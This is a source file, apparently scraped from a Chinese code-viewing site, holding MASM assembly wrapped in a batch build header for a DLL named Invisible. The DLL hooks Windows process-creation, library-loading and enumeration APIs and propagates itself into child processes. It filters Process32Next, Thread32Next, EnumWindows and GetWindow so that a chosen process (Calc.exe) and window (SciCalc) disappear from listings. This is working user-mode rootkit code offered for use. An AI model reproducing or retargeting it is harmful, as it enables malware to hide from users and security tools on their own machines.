📄 invisible.bat
字号:
;@GOTO TRANSLATE
.586P
.MODEL FLAT, STDCALL
OPTION CASEMAP: NONE
INCLUDE WINDOWS.inc
UNICODE = FALSE
INCLUDE APIMACRO.mac
INCLUDE ApiHooks.inc
INCLUDELIB iKERNEL32.lib
INCLUDELIB iUSER32.lib
INCLUDELIB iApiHooks.lib
;------------------------------------------------------------------
.DATA?
CurPID DWORD ?
OrigEnumWinProc DWORD ?
prinfo PROCESS_INFORMATION <>
stinfo STARTUPINFO <>
PathHooks SIGN MAX_PATH DUP (?)
LOADPARMS32 STRUCT
lpEnvAddress LPSTR ?
lpCmdLine LPSTR ?
lpCmdShow LPSTR ?
dwReserved DWORD ?
LOADPARMS32 ENDS
.CODE
ALIGN 4
DynaHooks API_HOOK <HOOKS_DYNAMIC>
BeginHooks Invisible
MkHook , , CreateProcessA;, HOOK_ALL+HOOK_HARD
MkHook , , LoadModule;, HOOK_ALL+HOOK_HARD
MkHook , , WinExec;, HOOK_ALL+HOOK_HARD
MkHook , , LoadLibraryA;, HOOK_ALL+HOOK_HARD
MkHook , , LoadLibraryExA;, HOOK_ALL+HOOK_HARD
MkHook , , GetProcAddress;, HOOK_ALL+HOOK_HARD
MkHook , , Process32Next;, HOOK_ALL+HOOK_HARD
MkHook , , Thread32Next;, HOOK_ALL+HOOK_HARD
MkHook ,USER32, EnumWindows;, HOOK_ALL+HOOK_HARD
MkHook ,USER32, GetWindow;, HOOK_ALL+HOOK_HARD
NoHooks = ($-Invisible)/API_HOOK
EndHooks
TEXTA KERNEL32, <KERNEL32.dll/0>
TEXTA USER32, <USER32.dll/0>
TEXTA CreateProcessA, <CreateProcessA/0>
TEXTA LoadModule, <LoadModule/0>
TEXTA WinExec, <WinExec/0>
TEXTA LoadLibraryA, <LoadLibraryA/0>
TEXTA LoadLibraryExA, <LoadLibraryExA/0>
TEXTA GetProcAddress, <GetProcAddress/0>
TEXTA Process32Next, <Process32Next/0>
TEXTA Thread32Next, <Thread32Next/0>
TEXTA EnumWindows, <EnumWindows/0>
TEXTA GetWindow, <GetWindow/0>
TEXTA Proc2Hide, <Calc.exe/0>
TEXT Wind2Hide, <SciCalc/0>
;------------------------------------------------------------------
DllMain:
CMP DWORD PTR [ESP+8], DLL_PROCESS_ATTACH
JNE @F
iWin32 GetCurrentProcessId
MOV CurPID, EAX
MOV stinfo.cb, SIZEOF STARTUPINFO
iWin32i GetModuleFileName, [ESP+12], OFFSET PathHooks, MAX_PATH
@@:
PUSH TRUE
POP EAX
RETN 12
;Helper part-----------
;------------------------------------------------------------------
NewCreateProcessA PROC lpApplicationName, lpCommandLine,\
lpProcessAttributes, lpThreadAttributes,\
bInheritHandles, dwCreationFlags, \
lpEnvironment, lpCurrentDirectory,\
lpStartupInfo, lpProcessInformation
MOV EAX, dwCreationFlags
OR EAX, CREATE_SUSPENDED
iWin32 CreateProcessA, lpApplicationName, lpCommandLine,\
lpProcessAttributes, lpThreadAttributes,\
bInheritHandles, EAX,\
lpEnvironment, lpCurrentDirectory,\
lpStartupInfo, lpProcessInformation
TEST EAX, EAX
JE @Failed
PUSHp EAX, EBX
MOV EBX, lpProcessInformation
ASSUME EBX: PTR PROCESS_INFORMATION
iWin32 EstablishApiHooksA, OFFSET PathHooks, [EBX].dwProcessId
TEST dwCreationFlags, CREATE_SUSPENDED
JNE @F
iWin32 ResumeThread, [EBX].hThread
@@:
POPc EAX, EBX
@Failed:
RET
NewCreateProcessA ENDP
;------------------------------------------------------------------
NewLoadModule PROC lpModuleName, lpParameterBlock
MOV EAX, lpParameterBlock
ASSUME EAX: PTR LOADPARMS32
MOV ECX, [EAX].lpCmdShow
MOV EDX, [EAX].lpCmdLine
CMP WORD PTR [ECX], 2
JNE @Fail
MOV CX, [ECX+2]
CMP BYTE PTR [EDX], 0
MOV stinfo.wShowWindow, CX
MOV ECX, 0
JE @F
LEA ECX, [EDX+1]
@@:
iWin32 CreateProcessA, lpModuleName, ECX, \
NULL, NULL, FALSE, CREATE_SUSPENDED,\
[EAX].lpEnvAddress, NULL,\
OFFSET stinfo, OFFSET prinfo
TEST EAX, EAX
JNE @F
@Fail:
LEAVE
iWin32j LoadModule
@@:
iWin32 EstablishApiHooksA, OFFSET PathHooks, prinfo.dwProcessId
iWin32 CloseHandle, prinfo.hProcess
iWin32 ResumeThread, prinfo.hThread
iWin32 CloseHandle, prinfo.hThread
MOV EAX, 32
RET
NewLoadModule ENDP
;------------------------------------------------------------------
NewWinExec PROC lpszCmdLine, fuCmdShow
MOV EAX, fuCmdShow
MOV stinfo.wShowWindow, AX
iWin32 CreateProcessA, NULL, lpszCmdLine, \
NULL, NULL, FALSE, CREATE_SUSPENDED,\
NULL, NULL,\
OFFSET stinfo, OFFSET prinfo
TEST EAX, EAX
JNE @F
LEAVE
iWin32j WinExec
@@:
iWin32 EstablishApiHooksA, OFFSET PathHooks, prinfo.dwProcessId
iWin32 CloseHandle, prinfo.hProcess
iWin32 ResumeThread, prinfo.hThread
iWin32 CloseHandle, prinfo.hThread
MOV EAX, 32
RET
NewWinExec ENDP
;------------------------------------------------------------------
NewGetProcAddress PROC hLibrary, lpszProc
CMP lpszProc, 10000H
JB @GoGPA
iWin32 GetModuleHandleA, sKERNEL32
CMP EAX, hLibrary
JNE @GoUser32
CmpApi MACRO __ApiNomen
iWin32 lstrcmp, lpszProc, s&__ApiNomen
TEST EAX, EAX
JNE @F
MOV EAX, New&__ApiNomen
JMP @RetGPA
@@:
ENDM
CmpApi CreateProcessA
CmpApi LoadModule
CmpApi WinExec
CmpApi LoadLibraryA
CmpApi LoadLibraryExA
CmpApi GetProcAddress
CmpApi Process32Next
CmpApi Thread32Next
JMP @GoGPA
@GoUser32:
iWin32 GetModuleHandleA, sKERNEL32
CMP EAX, hLibrary
JNE @GoGPA
CmpApi EnumWindows
CmpApi GetWindow
@GoGPA:
LEAVE
iWin32j GetProcAddress
@RetGPA:
RET
NewGetProcAddress ENDP
;------------------------------------------------------------------
PrepareDynamic PROC lpLibFileName
MOV EAX, lpLibFileName
MOV ECX, NoHooks
JECXZ Fin
MOV EDX, OFFSET DynaHooks ;Invisible - API_HOOK
@@:
ADD EDX, API_HOOK
MOV (API_HOOK PTR [EDX]).ModuleImport, EAX
LOOP @B
Fin:
RET
PrepareDynamic ENDP
;------------------------------------------------------------------
NewLoadLibraryA PROC lpLibFileName
iWin32 LoadLibraryA, lpLibFileName
TEST EAX, EAX
JE @F
PUSH EAX
sWin32 PrepareDynamic, lpLibFileName
iWin32 EstablishApiHooksA, OFFSET DynaHooks, CurPID
POP EAX
@@:
RET
NewLoadLibraryA ENDP
;------------------------------------------------------------------
NewLoadLibraryExA PROC lpLibFileName, hFile, dwFlags
iWin32 LoadLibraryExA, lpLibFileName, hFile, dwFlags
TEST EAX, EAX
JE @F
CMP dwFlags, DONT_RESOLVE_DLL_REFERENCES
JE @F
CMP dwFlags, LOAD_LIBRARY_AS_DATAFILE
JE @F
PUSH EAX
sWin32 PrepareDynamic, lpLibFileName
iWin32 EstablishApiHooksA, OFFSET DynaHooks, CurPID
POP EAX
@@:
RET
NewLoadLibraryExA ENDP
;------------------------------------------------------------------
;Executive part
NewProcess32Next PROC hSnapshot, lpProcEntry32
Nochmals:
iWin32 Process32Next, hSnapshot, lpProcEntry32
TEST EAX, EAX
JE Fin
PUSH EAX
MOV EAX, lpProcEntry32
ADD EAX, PROCESSENTRY32.szExeFile
@@:
CMP BYTE PTR [EAX], 0
JE @F
CMP BYTE PTR [EAX], "\"
JE @Fond
INC EAX
JMP @B
@Fond:
INC EAX
MOV EDX, EAX
JMP @B
@@:
iWin32 lstrcmpiA, EDX, sProc2Hide
TEST EAX, EAX
POP EAX
JE Nochmals
Fin:
RET
NewProcess32Next ENDP
;--------------------------------------------------------------------------------
NewThread32Next PROC USES EBX, hSnapshot, lpThreadEntry32
Nochmals:
iWin32 Thread32Next, hSnapshot, lpThreadEntry32
TEST EAX, EAX
MOV EBX, EAX
JE Fin
iWin32i FindWindow, sWind2Hide, NULL
TEST EAX, EAX
JE Fin
PUSH ECX
iWin32 GetWindowThreadProcessId, EAX, ESP
MOV ECX, lpThreadEntry32
POP EAX
CMP EAX, (THREADENTRY32 PTR [ECX]).th32OwnerProcessID
JE Nochmals
Fin:
MOV EAX, EBX
RET
NewThread32Next ENDP
;--------------------------------------------------------------------------------
NewEnumWindows PROC lpEnumFunc, lParam
CMP OrigEnumWinProc, NULL
JE @F
iWin32 EnumWindows, lpEnumFunc, lParam
RET
@@:
PUSH lpEnumFunc
POP OrigEnumWinProc
iWin32 EnumWindows, NewEnumProc, lParam
AND OrigEnumWinProc, NULL
RET
NewEnumWindows ENDP
NewEnumProc PROC USES ESI, hwnd, lParam
iWin32i FindWindow, sWind2Hide, NULL
TEST EAX, EAX
JE OrigEnumP
CMP EAX, hwnd
PUSH TRUE
POP EAX
JE @F
OrigEnumP:
sWin32 OrigEnumWinProc, hwnd, lParam
@@:
RET
NewEnumProc ENDP
;--------------------------------------------------------------------------------
NewGetWindow PROC USES EBX, hWnd, uCmd
iWin32i FindWindow, sWind2Hide, NULL
TEST EAX, EAX
JE NotMe
MOV EBX, EAX
CMP EAX, hWnd
JNE NotMe
CMP uCmd, GW_CHILD
JNE @F
SUB EAX, EAX
RET
@@:
iWin32 GetWindow, EAX, uCmd
Next:
MOV hWnd, EAX
NotMe:
iWin32 GetWindow, hWnd, uCmd
TEST EAX, EAX
JE Fin
CMP EAX, EBX
JE Next
Fin:
RET
NewGetWindow ENDP
;------------------------------------------------------------------
END DllMain
:TRANSLATE
@ECHO OFF
ML /c /coff /nologo Invisible.bat
eLINK Invisible /nologo /DLL /EXPORT:Invisible,@1,NONAME /SUBSYSTEM:WINDOWS /MERGE:.rdata=.text /MERGE:.idata=.text /IGNORE:4078,4086REM /BASE:0X77240000
DEL Invisible.obj
DEL Invisible.exp
DEL Invisible.lib
pause
cls⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -